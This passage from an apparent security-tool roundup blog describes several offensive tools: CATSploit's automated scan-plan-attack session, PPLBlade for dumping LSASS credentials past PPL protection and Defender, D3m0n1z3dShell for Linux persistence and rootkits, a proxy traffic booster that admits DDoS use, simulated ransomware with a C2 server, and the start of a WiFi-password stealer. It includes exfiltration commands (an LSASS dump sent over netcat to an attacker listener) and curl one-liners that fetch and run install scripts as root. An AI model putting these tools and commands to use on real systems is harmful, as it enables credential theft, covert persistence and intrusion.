    • generator.maxscenarios: Maximum number of scenarios to calculate (*)
  • ATTACKPF
    • msfpassword: password of MSFRPCD
    • openvas.user: username of PostgreSQL
    • openvas.password: password of PostgreSQL
    • openvas.maxhosts: Maximum number of hosts to be tested at the same time (*)
    • openvas.maxchecks: Maximum number of test items to be tested at the same time (*)
  • ATTACKDB
    • attack_db_dir: Path to the folder where AttackSteps are stored

(*) Adjust the number according to the specs of your machine.

Usage

To start the server, execute the following command:

$ python cats_server.py -c [CONFIG_FILE]

Next, prepare another console, start the client program, and initiate a connection to the server.

$ python catsploit.py -s [SOCKET_PATH]

After successfully connecting to the server and initializing it, the session will start.

   _________  ___________       __      _ __
/ ____/ |/_ __/ ___/____ / /___ (_) /_
/ / / /| | / / \__ \/ __ \/ / __ \/ / __/
/ /___/ ___ |/ / ___/ / /_/ / / /_/ / / /_
\____/_/ |_/_/ /____/ .___/_/\____/_/\__/
/_/

[*] Connecting to cats-server
[*] Done.
[*] Initializing server
[*] Done.
catsploit>

The client can execute a variety of commands. Each command can be executed with the -h option to display the format of its arguments.

usage: [-h] {host,scenario,scan,plan,attack,post,reset,help,exit} ...

positional arguments:
{host,scenario,scan,plan,attack,post,reset,help,exit}

options:
-h, --help show this help message and exit

I've posted the commands and options below as well for reference.

host list:
show information about the hosts
usage: host list [-h]
options:
-h, --help show this help message and exit

host detail:
show more information about one host
usage: host detail [-h] host_id
positional arguments:
host_id ID of the host for which you want to show information
options:
-h, --help show this help message and exit

scenario list:
show information about the scenarios
usage: scenario list [-h]
options:
-h, --help show this help message and exit

scenario detail:
show more information about one scenario
usage: scenario detail [-h] scenario_id
positional arguments:
scenario_id ID of the scenario for which you want to show information
options:
-h, --help show this help message and exit

scan:
run network-scan and security-scan
usage: scan [-h] [--port PORT] target_host [target_host ...]
positional arguments:
target_host IP address to be scanned
options:
-h, --help show this help message and exit
--port PORT ports to be scanned

plan:
planning attack scenarios
usage: plan [-h] src_host_id dst_host_id
positional arguments:
src_host_id originating host
dst_host_id target host
options:
-h, --help show this help message and exit

attack:
execute attack scenario
usage: attack [-h] scenario_id
positional arguments:
scenario_id ID of the scenario you want to execute

options:
-h, --help show this help message and exit

post find-secret:
find confidential information files that can be performed on the pwned host
usage: post find-secret [-h] host_id
positional arguments:
host_id ID of the host for which you want to find confidential information
options:
-h, --help show this help message and exit

reset:
reset data on the server
usage: reset [-h] {system} ...
positional arguments:
{system} reset system
options:
-h, --help show this help message and exit

exit:
exit CATSploit
usage: exit [-h]
options:
-h, --help show this help message and exit

Examples

In this example, we use CATSploit to scan network, plan the attack scenario, and execute the attack.

catsploit> scan 192.168.0.0/24
Network Scanning ... 100%
[*] Total 2 hosts were discovered.
Vulnerability Scanning ... 100%
[*] Total 14 vulnerabilities were discovered.
catsploit> host list
┏━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━┓
┃ hostID   ┃ IP           ┃ Hostname ┃ Platform                ┃ Pwned ┃
┑━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━┩
β”‚ attacker β”‚ 0.0.0.0      β”‚ kali     β”‚ kali 2022.4             β”‚ True  β”‚
β”‚ h_exbiy6 β”‚ 192.168.0.10 β”‚          β”‚ Linux 3.10 - 4.11       β”‚ False β”‚
β”‚ h_nhqyfq β”‚ 192.168.0.20 β”‚          β”‚ Microsoft Windows 7 SP1 β”‚ False β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”˜


catsploit> host detail h_exbiy6
┏━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━┓
┃ hostID   ┃ IP           ┃ Hostname ┃ Platform     ┃ Pwned ┃
┑━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━┩
β”‚ h_exbiy6 β”‚ 192.168.0.10 β”‚ ubuntu   β”‚ ubuntu 14.04 β”‚ False β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”˜

[IP address]
┏━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━┳━━━━━━━━━━━━┓
┃ ipv4         ┃ ipv4mask ┃ ipv6 ┃ ipv6prefix ┃
┑━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━╇━━━━━━━━━━━━┩
β”‚ 192.168.0.10 β”‚          β”‚      β”‚            β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

[Open ports]
┏━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┳━━━━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ ip ┃ proto ┃ port ┃ service ┃ product ┃ version ┃
┑━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
β”‚ 192.168.0.10 β”‚ tcp β”‚ 21 β”‚ ftp β”‚ ProFTPD β”‚ 1.3.5 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 22 β”‚ ssh β”‚ OpenSSH β”‚ 6.6.1p1 Ubuntu 2ubuntu2.10 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ http β”‚ Apache httpd β”‚ 2.4.7 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 445 β”‚ netbios-ssn β”‚ Samba smbd β”‚ 3.X - 4.X β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ ipp β”‚ CUPS β”‚ 1.7 β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

[Vulnerabilities]
┏━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━┓
┃ ip ┃ proto ┃ port ┃ vuln_name ┃ cve ┃
┑━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━┩
β”‚ 192.168.0.10 β”‚ tcp β”‚ 0 β”‚ TCP Timestamps Information Disclosure β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 21 β”‚ FTP Unencrypted Cleartext Login β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 22 β”‚ Weak MAC Algorithm(s) Supported (SSH) β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 22 β”‚ Weak Encryption Algorithm(s) Supported (SSH) β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 22 β”‚ Weak Host Key Algorithm(s) (SSH) β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 22 β”‚ Weak Key Exchange (KEX) Algorithm(s) Supported (SSH) β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Test HTTP dangerous methods β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Drupal Core SQLi Vulnerability (SA-CORE-2014-005) - Active Check β”‚ CVE-2014-3704 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Drupal Coder RCE Vulnerability (SA-CONTRIB-2016-039) - Active Check β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Sensitive File Disclosure (HTTP) β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Unprotected Web App / Device Installers (HTTP) β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Cleartext Transmission of Sensitive Information via HTTP β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ jQuery < 1.9.0 XSS Vulnerability β”‚ CVE-2012-6708 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ jQuery < 1.6.3 XSS Vulnerability β”‚ CVE-2011-4969 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Drupal 7.0 Information Disclosure Vulnerability - Active Check β”‚ CVE-2011-3730 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS β”‚ CVE-2016-2183 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS β”‚ CVE-2016-6329 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS β”‚ CVE-2020-12872 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection β”‚ CVE-2011-3389 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection β”‚ CVE-2015-0204 β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

[Users]
┏━━━━━━━━━━━┳━━━━━━━┓
┃ user name ┃ group ┃
┑━━━━━━━━━━━╇━━━━━━━┩
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”˜


catsploit> plan attacker h_exbiy6
Planning attack scenario...100%
[*] Done. 15 scenarios was planned.
[*] To check each scenario, try 'scenario list' and/or 'scenario detail'.
catsploit> scenario list
┏━━━━━━━━━━━━━┳━━━━━ ━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━━┳━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ scenario id ┃ src host ip ┃ target host ip ┃ eVc ┃ eVd ┃ steps ┃ first attack step ┃
┑━━━━━━━━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━&#947 3;━━━━━━━╇━━━━━━━╇━━━━━━━╇━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
β”‚ 3d3ivc β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 1.0 β”‚ 32.0 β”‚ 1 β”‚ exploit/multi/http/jenkins_s… β”‚
β”‚ 5gnsvh β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 1.0 β”‚ 53.76 β”‚ 2 β”‚ exploit/multi/http/jenkins_s… β”‚
β”‚ 6nlxyc β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.0 β”‚ 48.32 β”‚ 2 β”‚ exploit/multi/http/jenkins_s… β”‚
β”‚ 8jos4z      β”‚ 0.0.0.0     β”‚ 192.168.0.10   β”‚ 0.7   β”‚ 72.8  β”‚ 2     β”‚ exploit/multi/http/jenkins_s… β”‚
β”‚ 8kmmts β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.0 β”‚ 32.0 β”‚ 1 β”‚ exploit/multi/elasticsearch/… β”‚
β”‚ agjmma β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.0 β”‚ 24.0 β”‚ 1 β”‚ exploit/windows/http/managee… β”‚
β”‚ joglhf β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 70.0 β”‚ 60.0 β”‚ 1 β”‚ auxiliary/scanner/ssh/ssh_lo… β”‚
β”‚ rmgrof β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 100.0 β”‚ 32.0 β”‚ 1 β”‚ exploit/multi/http/drupal_dr… β”‚
β”‚ xuowzk β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.0 β”‚ 24.0 β”‚ 1 β”‚ exploit/multi/http/struts_dm… β”‚
β”‚ yttv51 β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.01 β”‚ 53.76 β”‚ 2 β”‚ exploit/multi/http/jenkins_s… β”‚
β”‚ znv76x β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.01 β”‚ 53.76 β”‚ 2 β”‚ exploit/multi/http/jenkins_s… β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

catsploit> scenario detail rmgrof
┏━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┓
┃ src host ip ┃ target host ip ┃ eVc ┃ eVd ┃
┑━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━┩
β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 100.0 β”‚ 32.0 β”‚
└─────────────┴────────────────┴───────┴──────┘

[Steps]
┏━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━┓
┃ # ┃ step ┃ params ┃
┑━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━┩
β”‚ 1 β”‚ exploit/multi/http/drupal_drupageddon β”‚ RHOSTS: 192.168.0.10 β”‚
β”‚ β”‚ β”‚ LHOST: 192.168.10.100 β”‚
β””β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜


catsploit> attack rmgrof
> ~> ~
> Metasploit Console Log
> ~
> ~
[+] Attack scenario succeeded!


catsploit> exit
Bye.

Disclaimer

All information and code is provided solely for educational purposes and/or for testing your own systems.

Contact

For any inquiries, please contact us at the following email address:

catsploit@nk.MitsubishiElectric.co.jp



PPLBlade - Protected Process Dumper Tool

By: Zion3R


Protected Process Dumper Tool that supports obfuscating memory dumps and transferring them to remote workstations without dropping them onto the disk.

Key functionalities:

  1. Bypassing PPL protection
  2. Obfuscating memory dump files to evade Defender signature-based detection mechanisms
  3. Uploading memory dump with RAW and SMB upload methods without dropping it onto the disk (fileless dump)

Overview of the techniques, used in this tool can be found here: https://tastypepperoni.medium.com/bypassing-defenders-lsass-dump-detection-and-ppl-protection-in-go-7dd85d9a32e6

Note that PROCEXP152.sys is listed in the source files for compiling purposes. It does not need to be transferred to the target machine alongside the PPLBlade.exe.

It's already embedded in PPLBlade.exe; the exploit is just a single executable.

Modes:

  1. Dump - Dump process memory using PID or Process Name
  2. Decrypt - Revert an obfuscated (--obfuscate) dump file to its original state
  3. Cleanup - Do cleanup manually, in case something goes wrong during execution (note that the option values should be the same as those of the execution we're trying to clean up)
  4. DoThatLsassThing - Dump lsass.exe using Process Explorer driver (basic poc)

Handle Modes:

  1. Direct - Opens a PROCESS_ALL_ACCESS handle directly, using the OpenProcess() function (see the sketch below)
  2. Procexp - Uses PROCEXP152.sys to obtain a handle
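
For illustration, here is a minimal Python/ctypes sketch of the idea behind the Direct handle mode. It is only a sketch of the underlying Win32 call, not PPLBlade's actual code (the tool itself is written in Go), and the target PID is a placeholder:

# Windows-only illustration of the "Direct" handle mode idea:
# open a PROCESS_ALL_ACCESS handle via OpenProcess().
import ctypes

PROCESS_ALL_ACCESS = 0x1F0FFF
pid = 1234  # placeholder target PID

kernel32 = ctypes.windll.kernel32
handle = kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, pid)
if not handle:
    raise ctypes.WinError()  # raises with the last Win32 error code
print(f"Got handle {handle:#x} to PID {pid}")
kernel32.CloseHandle(handle)
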
Examples:

Basic POC that uses PROCEXP152.sys to dump lsass:

PPLBlade.exe --mode dothatlsassthing

(Note that it does not XOR the dump file; provide the additional --obfuscate flag to enable the XOR functionality)

Upload the obfuscated LSASS dump onto a remote location:

PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234

Attacker host:

nc -lnp 1234 > lsass.dmp
python3 deobfuscate.py --dumpname lsass.dmp

Deobfuscate memory dump:

PPLBlade.exe --mode decrypt --dumpname PPLBlade.dmp --key PPLBlade
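
Since the obfuscation is a plain XOR, reverting a dump offline is straightforward. Below is a minimal repeating-key XOR sketch for illustration; the bundled deobfuscate.py is the supported way to do this, and the file/key arguments here are placeholders:

# Repeating-key XOR is symmetric: the same pass obfuscates and deobfuscates.
# Illustrative sketch only; use the bundled deobfuscate.py in practice.
import itertools
import sys

def xor_bytes(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ k for b, k in zip(data, itertools.cycle(key)))

if __name__ == "__main__":
    path, key = sys.argv[1], sys.argv[2].encode()  # e.g. PPLBlade.dmp PPLBlade
    with open(path, "rb") as f:
        blob = f.read()
    with open(path + ".dec", "wb") as f:
        f.write(xor_bytes(blob, key))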


Valid8Proxy - Tool Designed For Fetching, Validating, And Storing Working Proxies

By: Zion3R


Valid8Proxy is a versatile and user-friendly tool designed for fetching, validating, and storing working proxies. Whether you need proxies for web scraping, data anonymization, or testing network security, Valid8Proxy simplifies the process by providing a seamless way to obtain reliable and verified proxies.


Features:

  1. Proxy Fetching: Retrieve proxies from popular proxy sources with a single command.
  2. Proxy Validation: Efficiently validate proxies using multithreading to save time.
  3. Save to File: Save the list of validated proxies to a file for future use.

Usage:

  1. Clone the Repository:

    git clone https://github.com/spyboy-productions/Valid8Proxy.git
  2. Navigate to the Directory:

    cd Valid8Proxy
  3. Install Dependencies:

    pip install -r requirements.txt
  4. Run the Tool:

    python Valid8Proxy.py
  5. Follow Interactive Prompts:

    • Enter the number of proxies you want to print.
    • Sit back and let Valid8Proxy fetch, validate, and display working proxies.
  6. Save to File:

    • At the end of the process, Valid8Proxy will save the list of working proxies to a file named "proxies.txt" in the same directory.
  7. Check Results:

    • Review the working proxies in the terminal with color-coded output.
    • Find the list of working proxies saved in "proxies.txt."

If you already have proxies and just want to validate them, use this:

python Validator.py

Follow the prompts:

Enter the path to the file containing proxies (e.g., proxy_list.txt). Enter the number of proxies you want to validate. The script will then validate the specified number of proxies using multiple threads and print the valid proxies.
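
Under the hood, multithreaded validation boils down to firing a test request through each proxy and keeping the ones that answer. A minimal sketch of that idea, assuming HTTP proxies in ip:port format and using httpbin.org as an illustrative test endpoint (this is not Valid8Proxy's actual code):

# Minimal multithreaded proxy-validation sketch (illustrative only).
import requests
from concurrent.futures import ThreadPoolExecutor

TEST_URL = "https://httpbin.org/ip"  # illustrative test endpoint

def check(proxy):
    proxies = {"http": f"http://{proxy}", "https": f"http://{proxy}"}
    try:
        if requests.get(TEST_URL, proxies=proxies, timeout=5).ok:
            return proxy
    except requests.RequestException:
        pass
    return None

with open("proxy_list.txt") as f:
    candidates = [line.strip() for line in f if line.strip()]

with ThreadPoolExecutor(max_workers=25) as pool:
    working = [p for p in pool.map(check, candidates) if p]

print(f"{len(working)}/{len(candidates)} proxies are working")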

Contribution:

Contributions and feature requests are welcome! If you encounter any issues or have ideas for improvement, feel free to open an issue or submit a pull request.

Snapshots:

If you find this GitHub repo useful, please consider giving it a star!



D3m0n1z3dShell - Demonized Shell Is An Advanced Tool For Persistence In Linux

By: Zion3R


Demonized Shell is an advanced tool for persistence in Linux.


Install

git clone https://github.com/MatheuZSecurity/D3m0n1z3dShell.git
cd D3m0n1z3dShell
chmod +x demonizedshell.sh
sudo ./demonizedshell.sh

One-Liner Install

Download D3m0n1z3dShell with all files:

curl -L https://github.com/MatheuZSecurity/D3m0n1z3dShell/archive/main.tar.gz | tar xz && cd D3m0n1z3dShell-main && sudo ./demonizedshell.sh

Load D3m0n1z3dShell statically (without the static-binaries directory):

sudo curl -s https://raw.githubusercontent.com/MatheuZSecurity/D3m0n1z3dShell/main/static/demonizedshell_static.sh -o /tmp/demonizedshell_static.sh && sudo bash /tmp/demonizedshell_static.sh

Demonized Features

  • Auto Generate SSH keypair for all users
  • APT Persistence
  • Crontab Persistence
  • Systemd User level
  • Systemd Root Level
  • Bashrc Persistence
  • Privileged user & SUID bash
  • Modified LKM Rootkit, bypassing rkhunter & chkrootkit
  • LKM Rootkit with file encoder, persistent ICMP backdoor, and other features
  • ICMP Backdoor
  • LD_PRELOAD Setup PrivEsc
  • Static binaries for process monitoring, credential dumping, enumeration, trolling, and more

Pending Features

  • LD_PRELOAD Rootkit
  • Process Injection
  • One-liner install, for example: curl github.com/test/test/demonized.sh | bash
  • Static D3m0n1z3dShell
  • Intercept Syscall Write from a file
  • ELF/Rootkit Anti-Reversing Technique
  • PAM Backdoor
  • rc.local Persistence
  • init.d Persistence
  • motd Persistence
  • Persistence via php webshell and aspx webshell

And other types of features that will come in the future.

Contribution

If you want to contribute and help with the tool, please contact me on twitter: @MatheuzSecurity

Note

We are not responsible for any damage caused by this tool, use the tool intelligently and for educational purposes only.



PhantomCrawler - Boost Website Hits By Generating Requests From Multiple Proxy IPs

By: Zion3R


PhantomCrawler allows users to simulate website interactions through different proxy IP addresses. It leverages Python, requests, and BeautifulSoup to offer a simple and effective way to test website behaviour under varied proxy configurations.

Features:

  • Utilizes a list of proxy IP addresses from a specified file.
  • Supports both HTTP and HTTPS proxies.
  • Allows users to input the target website URL, proxy file path, and a static port.
  • Makes HTTP requests to the specified website using each proxy.
  • Parses HTML content to extract and visit links on the webpage (see the sketch below).
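
A minimal sketch of that fetch-through-proxy and link-extraction loop, assuming one ip:port HTTP proxy per line in proxies.txt and an illustrative target URL (this is not PhantomCrawler's actual code):

# Illustrative request-through-proxy and link-parsing loop.
import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin

TARGET = "https://example.com/"  # illustrative target

with open("proxies.txt") as f:
    proxies = [line.strip() for line in f if line.strip()]

for proxy in proxies:
    cfg = {"http": f"http://{proxy}", "https": f"http://{proxy}"}
    try:
        resp = requests.get(TARGET, proxies=cfg, timeout=10)
    except requests.RequestException:
        continue  # dead proxy, try the next one
    soup = BeautifulSoup(resp.text, "html.parser")
    links = [urljoin(TARGET, a["href"]) for a in soup.find_all("a", href=True)]
    print(f"{proxy}: HTTP {resp.status_code}, {len(links)} links found")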

Usage:

  • POC Testing: Simulate website interactions to assess functionality under different proxy setups.
  • Web Traffic Increase: Boost website hits by generating requests from multiple proxy IPs.
  • Proxy Rotation Testing: Evaluate the effectiveness of rotating proxy IPs.
  • Web Scraping Testing: Assess web scraping tasks under different proxy configurations.
  • DDoS Awareness: Caution: The tool has the potential for misuse as a DDoS tool. Ensure responsible and ethical use.

Get new proxies (with ports) and add them to proxies.txt in this format: 50.168.163.176:80
  • You can get them from here: https://free-proxy-list.net/ (these free proxies are not validated and some might not work, so validate them before adding).

How to Use:

  1. Clone the repository:
git clone https://github.com/spyboy-productions/PhantomCrawler.git
  2. Install dependencies:
pip3 install -r requirements.txt
  3. Run the script:
python3 PhantomCrawler.py

Disclaimer: PhantomCrawler is intended for educational and testing purposes only. Users are cautioned against any misuse, including potential DDoS activities. Always ensure compliance with the terms of service of websites being tested and adhere to ethical standards.


Snapshots:

If you find this GitHub repo useful, please consider giving it a star!Β 



RansomwareSim - A Simulated Ransomware

By: Zion3R

Overview

RansomwareSim is a simulated ransomware application developed for educational and training purposes. It is designed to demonstrate how ransomware encrypts files on a system and communicates with a command-and-control server. This tool is strictly for educational use and should not be used for malicious purposes.

Features

  • Encrypts specified file types within a target directory.
  • Changes the desktop wallpaper (Windows only).
  • Creates and deletes a README file on the desktop with a simulated ransom note.
  • Simulates communication with a command-and-control server to send system data and receive a decryption key.
  • Decrypts files after receiving the correct key (see the sketch below).
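
Since cryptography is among the requirements, the encrypt/decrypt cycle can be pictured with Fernet. The following is a minimal sketch under that assumption; it is not necessarily RansomwareSim's exact scheme, and the target path is a placeholder:

# Minimal Fernet encrypt/decrypt sketch (assumption based on the
# cryptography requirement; not necessarily RansomwareSim's exact scheme).
from pathlib import Path
from cryptography.fernet import Fernet

key = Fernet.generate_key()           # in the simulation, the C2 would hold this
cipher = Fernet(key)

target = Path("testdir/example.txt")  # placeholder target file
original = target.read_bytes()

target.write_bytes(cipher.encrypt(original))             # "ransom" the file
target.write_bytes(cipher.decrypt(target.read_bytes()))  # restore with the key
assert target.read_bytes() == original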

Usage

Important: This tool should only be used in controlled environments where all participants have given consent. Do not use this tool on any system without explicit permission. For more, read SECURE

Requirements

  • Python 3.x
  • cryptography
  • colorama

Installation

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/RansomwareSim.git
  2. Navigate to the project directory:

    cd RansomwareSim
  3. Install the required dependencies:

    pip install -r requirements.txt


Running the Control Server

  1. Open controlpanel.py.
  2. Start the server by running controlpanel.py.
  3. The server will listen for connections from RansomwareSim and the Decoder (see the sketch below).
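
As a rough picture of what such a listener does, here is a minimal TCP socket sketch; the port and message format are placeholders, not controlpanel.py's actual protocol:

# Minimal TCP listener sketch (placeholder port/protocol, not controlpanel.py).
import socket

HOST, PORT = "0.0.0.0", 9999  # placeholder port

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((HOST, PORT))
    srv.listen()
    print(f"[*] Listening on {HOST}:{PORT}")
    conn, addr = srv.accept()
    with conn:
        data = conn.recv(4096)           # e.g. system data sent by the simulator
        print(f"[+] {addr[0]} sent: {data!r}")
        conn.sendall(b"DECRYPTION-KEY")  # simulated key handout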

Running the Simulator

  1. Navigate to the directory containing RansomwareSim.
  2. Modify the main function in encoder.py to specify the target directory and other parameters.
  3. Run encoder.py to start the encryption process.
  4. Follow the instructions displayed on the console.

Running the Decoder

  1. Run decoder.py after the files have been encrypted.
  2. Follow the prompts to input the decryption key.

Disclaimer

RansomwareSim is developed for educational purposes only. The creators of RansomwareSim are not responsible for any misuse of this tool. This tool should not be used in any unauthorized or illegal manner. Always ensure ethical and legal use of this tool.

Contributing

Contributions, suggestions, and feedback are welcome. Please create an issue or pull request for any contributions.

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

Contact

For any inquiries or further information, you can reach me through the following channels:



WiFi-password-stealer - Simple Windows And Linux Keystroke Injection Tool That Exfiltrates Stored WiFi Data (SSID And Password)

By: Zion3R


Have you ever watched a film where a hacker plugs a seemingly ordinary USB drive into a victim's computer and steals data from it? - A proper wet dream for some.

Disclaimer: All content in this project is intended for security research purpose only.

Β 

Introduction

